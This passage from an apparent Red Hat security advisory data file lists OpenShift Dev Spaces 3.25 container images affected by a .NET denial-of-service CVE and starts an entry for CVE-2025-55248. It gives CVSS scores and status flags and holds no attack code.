"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dotnet: .NET Denial of Service Vulnerability"
},
{
"cve": "CVE-2025-55248",
"cwe": {
"id": "CWE-319",
"name": "Cleartext Transmission of Sensitive Information"
},
"discovery_date": "2025-10-10T13:00:27.907000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
